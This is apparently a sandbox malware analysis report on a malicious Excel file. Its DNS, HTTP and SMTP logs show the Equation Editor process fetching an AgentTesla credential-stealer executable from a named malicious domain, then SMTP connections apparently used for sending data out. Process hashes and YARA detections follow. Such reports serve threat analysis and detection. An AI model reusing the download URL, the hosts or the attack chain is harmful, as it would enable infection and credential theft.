Jan 13, 2021 13:17:21.856992006 CET | 8.8.8.8 | 192.168.2.22 | 0xfc39 | No error (0) | globuserinessserverfiletransferprotocol.mangospot.net | | 192.210.214.178 | A (IP address) | IN (0x0001)
Jan 13, 2021 13:17:21.913824081 CET | 8.8.8.8 | 192.168.2.22 | 0xfc39 | No error (0) | globuserinessserverfiletransferprotocol.mangospot.net | | 192.210.214.178 | A (IP address) | IN (0x0001)
Jan 13, 2021 13:17:21.970621109 CET | 8.8.8.8 | 192.168.2.22 | 0xfc39 | No error (0) | globuserinessserverfiletransferprotocol.mangospot.net | | 192.210.214.178 | A (IP address) | IN (0x0001)
Jan 13, 2021 13:19:00.342308998 CET | 8.8.8.8 | 192.168.2.22 | 0x5aac | No error (0) | smtp.privateemail.com | | 199.193.7.228 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• globuserinessserverfiletransferprotocol.mangospot.net

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49165 | 192.210.214.178 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp | kBytes transferred | Direction | Data
Jan 13, 2021 13:17:22.163568020 CET | 1 | OUT | GET /csrss/vbc.exe HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: globuserinessserverfiletransferprotocol.mangospot.net
    Connection: Keep-Alive
Jan 13, 2021 13:17:22.339915037 CET | 2 | IN | HTTP/1.1 200 OK
    Date: Wed, 13 Jan 2021 12:17:21 GMT
    Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7
    Last-Modified: Wed, 13 Jan 2021 09:01:13 GMT
    ETag: "ce000-5b8c461903ba5"
    Accept-Ranges: bytes
    Content-Length: 843776
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: application/x-msdownload


SMTP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Jan 13, 2021 13:19:00.728404999 CET | 587   | 49166 | 199.193.7.228 | 192.168.2.22  | 220 PrivateEmail.com prod Mail Node
Jan 13, 2021 13:19:00.728996992 CET | 49166 | 587   | 192.168.2.22  | 199.193.7.228 | EHLO 414408
Jan 13, 2021 13:19:00.907455921 CET | 587   | 49166 | 199.193.7.228 | 192.168.2.22  | 250-mta-11.privateemail.com
    250-PIPELINING
    250-SIZE 81788928
    250-ETRN
    250-AUTH PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250 STARTTLS
Jan 13, 2021 13:19:00.907985926 CET | 49166 | 587   | 192.168.2.22  | 199.193.7.228 | STARTTLS
Jan 13, 2021 13:19:01.086139917 CET | 587   | 49166 | 199.193.7.228 | 192.168.2.22  | 220 Ready to start TLS
Jan 13, 2021 13:19:05.362668991 CET | 587   | 49168 | 199.193.7.228 | 192.168.2.22  | 220 PrivateEmail.com prod Mail Node
Jan 13, 2021 13:19:05.362907887 CET | 49168 | 587   | 192.168.2.22  | 199.193.7.228 | EHLO 414408
Jan 13, 2021 13:19:05.549592972 CET | 587   | 49168 | 199.193.7.228 | 192.168.2.22  | 250-mta-11.privateemail.com
    250-PIPELINING
    250-SIZE 81788928
    250-ETRN
    250-AUTH PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250 STARTTLS
Jan 13, 2021 13:19:05.550520897 CET | 49168 | 587   | 192.168.2.22  | 199.193.7.228 | STARTTLS
Jan 13, 2021 13:19:05.736862898 CET | 587   | 49168 | 199.193.7.228 | 192.168.2.22  | 220 Ready to start TLS

Code Manipulations

Statistics

Behavior


System Behavior

General

Start time: 13:16:43
Start date: 13/01/2021
Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase: 0x13fe00000
File size: 27641504 bytes
MD5 hash: 5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 13:17:04
Start date: 13/01/2021
Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase: 0x400000
File size: 543304 bytes
MD5 hash: A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 13:17:08
Start date: 13/01/2021
Path: C:\Users\Public\vbc.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\Public\vbc.exe'
Imagebase: 0x1030000
File size: 843776 bytes
MD5 hash: B232B5C7754D932B07C0D47F934EFBFE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2165050170.0000000002511000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2165947138.0000000003519000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
Reputation: low

General

Start time: 13:17:15
Start date: 13/01/2021
Path: C:\Users\Public\vbc.exe
Wow64 process (32bit): true
Commandline: C:\Users\Public\vbc.exe
Imagebase: 0x1030000
File size: 843776 bytes
MD5 hash: B232B5C7754D932B07C0D47F934EFBFE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2359575035.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2360425643.000000000259A000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

Disassembly

Code Analysis
